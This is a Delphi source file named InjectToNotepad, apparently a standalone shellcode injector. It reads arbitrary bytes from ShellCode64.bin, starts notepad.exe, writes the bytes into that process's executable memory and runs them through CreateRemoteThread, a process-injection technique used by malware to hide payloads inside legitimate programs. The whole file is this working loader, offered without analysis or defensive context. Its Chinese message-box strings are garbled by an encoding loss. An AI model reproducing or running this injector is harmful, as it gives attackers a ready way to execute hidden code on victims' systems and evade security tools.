program InjectToNotepad;

{$R *.res}

type
  THandle = NativeUInt;
  DWORD = LongWord;
  ULONG_PTR = NativeUInt;
  BOOL = LongBool;
  ULONGLONG = UInt64;
  HWND = NativeUInt;
  UINT = LongWord;
  SIZE_T = ULONG_PTR;

  PULargeInteger = ^TULargeInteger;
  _ULARGE_INTEGER = record
    case Integer of
      0: (
        LowPart: DWORD;
        HighPart: DWORD);
      1: (
        QuadPart: ULONGLONG);
  end;
  TULargeInteger = UInt64;
  ULARGE_INTEGER = _ULARGE_INTEGER;

type
  POverlapped = ^TOverlapped;
  _OVERLAPPED = record
    Internal: ULONG_PTR;
    InternalHigh: ULONG_PTR;
    Offset: DWORD;
    OffsetHigh: DWORD;
    hEvent: THandle;
  end;
  TOverlapped = _OVERLAPPED;
  OVERLAPPED = _OVERLAPPED;

  PSecurityAttributes = ^TSecurityAttributes;
  _SECURITY_ATTRIBUTES = record
    nLength: DWORD;
    lpSecurityDescriptor: Pointer;
    bInheritHandle: BOOL;
  end;
  TSecurityAttributes = _SECURITY_ATTRIBUTES;
  SECURITY_ATTRIBUTES = _SECURITY_ATTRIBUTES;

  PProcessInformation = ^TProcessInformation;
  _PROCESS_INFORMATION = record
    hProcess: THandle;
    hThread: THandle;
    dwProcessId: DWORD;
    dwThreadId: DWORD;
  end;
  TProcessInformation = _PROCESS_INFORMATION;
  PROCESS_INFORMATION = _PROCESS_INFORMATION;

  _STARTUPINFOW = record
    cb: DWORD;
    lpReserved: PWideChar;
    lpDesktop: PWideChar;
    lpTitle: PWideChar;
    dwX: DWORD;
    dwY: DWORD;
    dwXSize: DWORD;
    dwYSize: DWORD;
    dwXCountChars: DWORD;
    dwYCountChars: DWORD;
    dwFillAttribute: DWORD;
    dwFlags: DWORD;
    wShowWindow: Word;
    cbReserved2: Word;
    lpReserved2: Pointer;
    hStdInput: THandle;
    hStdOutput: THandle;
    hStdError: THandle;
  end;
  TStartupInfoW = _STARTUPINFOW;
  STARTUPINFOW = _STARTUPINFOW;


const
  kernel32 = 'kernel32.dll';
  user32 = 'user32.dll';
  GENERIC_READ = DWORD($80000000);
  FILE_SHARE_READ = $00000001;
  FILE_SHARE_WRITE = $00000002;
  FILE_SHARE_DELETE = $00000004;
  OPEN_EXISTING = 3;
  INVALID_HANDLE_VALUE = THandle(-1);
  MB_ICONWARNING = $00000030;
  MB_ICONINFORMATION = $00000040;
  MB_TOPMOST = $00040000;
  MEM_COMMIT = $1000;
  PAGE_EXECUTE_READWRITE = $40;
  MEM_RELEASE = $8000;
  SW_SHOW = 5;
  INFINITE = DWORD($FFFFFFFF);

function ReadFile(hFile: THandle; var Buffer; nNumberOfBytesToRead: DWORD;
  var lpNumberOfBytesRead: DWORD; lpOverlapped: POverlapped): BOOL; stdcall; external kernel32;

function CreateFileW(lpFileName: PWideChar; dwDesiredAccess, dwShareMode: DWORD;
  lpSecurityAttributes: PSecurityAttributes; dwCreationDisposition, dwFlagsAndAttributes: DWORD;
  hTemplateFile: THandle): THandle; stdcall; external kernel32;

function GetFileSize(hFile: THandle; lpFileSizeHigh: Pointer): DWORD; stdcall; external kernel32;

function MessageBoxA(hWnd: HWND; lpText, lpCaption: PAnsiChar; uType: UINT): Integer; stdcall; external user32;

function VirtualAlloc(lpvAddress: Pointer; dwSize: SIZE_T; flAllocationType, flProtect: DWORD): Pointer; stdcall; external kernel32;

function VirtualFree(lpAddress: Pointer; dwSize: SIZE_T; dwFreeType: DWORD): BOOL; stdcall; external kernel32;

function CloseHandle(hObject: THandle): BOOL; stdcall; external kernel32;

function VirtualAllocEx(hProcess: THandle; lpAddress: Pointer; dwSize: SIZE_T; flAllocationType: DWORD; flProtect: DWORD): Pointer; stdcall; external kernel32;

function VirtualFreeEx(hProcess: THandle; lpAddress: Pointer; dwSize: SIZE_T; dwFreeType: DWORD): BOOL; stdcall; external kernel32;

function lstrcpyW(lpString1, lpString2: PWideChar): PWideChar; stdcall; external kernel32;

function CreateProcessW(lpApplicationName: PWideChar; lpCommandLine: PWideChar;
  lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
  bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
  lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfoW;
  var lpProcessInformation: TProcessInformation): BOOL; stdcall; external kernel32;

function CreateRemoteThread(hProcess: THandle; lpThreadAttributes: Pointer;
  dwStackSize: SIZE_T; lpStartAddress: Pointer; lpParameter: Pointer;
  dwCreationFlags: DWORD; var lpThreadId: DWORD): THandle; stdcall; external kernel32;

function WaitForSingleObject(hHandle: THandle; dwMilliseconds: DWORD): DWORD; stdcall; external kernel32;

function WriteProcessMemory(hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
  nSize: SIZE_T; var lpNumberOfBytesWritten: SIZE_T): BOOL; stdcall; external kernel32;

function FileRead(Handle: THandle; var Buffer; Count: LongWord): Integer;
begin
  if not ReadFile(Handle, Buffer, Count, LongWord(Result), nil) then
    Result := -1;
end;

var
  hFileRead: THandle;
  liSize: ULARGE_INTEGER;
  nCodeSize: Integer;
  pBuffer: Pointer;
var
  ProcessInfo: TProcessInformation;
  StartupInfo: TStartupInfoW;
  wszCmd: array[0..255] of WideChar;
  pRemoteBuffer: Pointer;
  BytesWritten: SIZE_T;
  hThreadHandle: THandle;
  dwTheadID: DWORD;
begin

{$IFNDEF WIN64}
{$MESSAGE Error 'Ϊ64λ'}
{$ENDIF}

  hFileRead := CreateFileW('ShellCode64.bin',
    GENERIC_READ,
    FILE_SHARE_READ or FILE_SHARE_WRITE or FILE_SHARE_DELETE,
    nil,
    OPEN_EXISTING,
    0,
    0);

  if hFileRead = INVALID_HANDLE_VALUE then
  begin
    MessageBoxA(0, 'ShellCode64.binʧܣļǷڣ', 'Ϣ', MB_ICONWARNING + MB_TOPMOST);
    Exit;
  end;

  liSize.LowPart := GetFileSize(hFileRead, @liSize.HighPart);
  nCodeSize := liSize.QuadPart;

  pBuffer := VirtualAlloc(nil, nCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  if pBuffer = nil then
  begin
    MessageBoxA(0, 'ڴʧ!', 'Ϣ', MB_ICONWARNING + MB_TOPMOST);
    CloseHandle(hFileRead);
    Exit;
  end;

  if FileRead(hFileRead, pBuffer^, nCodeSize) <> nCodeSize then
  begin
    MessageBoxA(0, 'ShellCode64.binȡʧ!', 'Ϣ', MB_ICONWARNING + MB_TOPMOST);
    CloseHandle(hFileRead);
    VirtualFree(pBuffer, nCodeSize, MEM_RELEASE);
    Exit;
  end;
  CloseHandle(hFileRead);


  //FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
  //FillChar(StartupInfo, SizeOf(TStartupInfo), 0);
  StartupInfo.cb := SizeOf(StartupInfo);
  StartupInfo.wShowWindow := SW_SHOW;

  lstrcpyW(wszCmd, 'notepad.exe');
  if not CreateProcessW(nil, wszCmd, nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo) then
  begin
    MessageBoxA(0, '޷notepad.exe', 'Ϣ', MB_ICONWARNING + MB_TOPMOST);
    VirtualFree(pBuffer, nCodeSize, MEM_RELEASE);
    Exit;
  end;

  pRemoteBuffer := VirtualAllocEx(ProcessInfo.hProcess, nil, nCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  if (pRemoteBuffer = nil) then
  begin
    MessageBoxA(0, 'VirtualAllocEx ʧܣ', 'Ϣ', MB_ICONWARNING + MB_TOPMOST);
    VirtualFree(pBuffer, nCodeSize, MEM_RELEASE);
    CloseHandle(ProcessInfo.hProcess);
    Exit;
  end;

  if not WriteProcessMemory(ProcessInfo.hProcess, pRemoteBuffer, pBuffer, nCodeSize, BytesWritten) then
  begin
    MessageBoxA(0, 'ڴд ʧܣ', 'Ϣ', MB_ICONWARNING + MB_TOPMOST);
    VirtualFree(pBuffer, nCodeSize, MEM_RELEASE);
    VirtualFreeEx(ProcessInfo.hProcess, pRemoteBuffer, 0, MEM_RELEASE);
    Exit;
  end;
  VirtualFree(pBuffer, nCodeSize, MEM_RELEASE);

  hThreadHandle := CreateRemoteThread(ProcessInfo.hProcess, nil, 0, pRemoteBuffer, nil, 0, dwTheadID);
  if hThreadHandle = INVALID_HANDLE_VALUE then
  begin
    MessageBoxA(0, 'CreateRemoteThreadʧܣ', 'Ϣ', MB_ICONWARNING + MB_TOPMOST);
    VirtualFreeEx(ProcessInfo.hProcess, pRemoteBuffer, 0, MEM_RELEASE);
    CloseHandle(ProcessInfo.hProcess);
    Exit;
  end;

  //עͽȴ±˳ͷڴ档
  //WaitForSingleObject(hThreadHandle, INFINITE);
  //VirtualFreeEx(ProcessInfo.hProcess, pRemoteBuffer, 0, MEM_RELEASE); 
  CloseHandle(ProcessInfo.hProcess);
end.

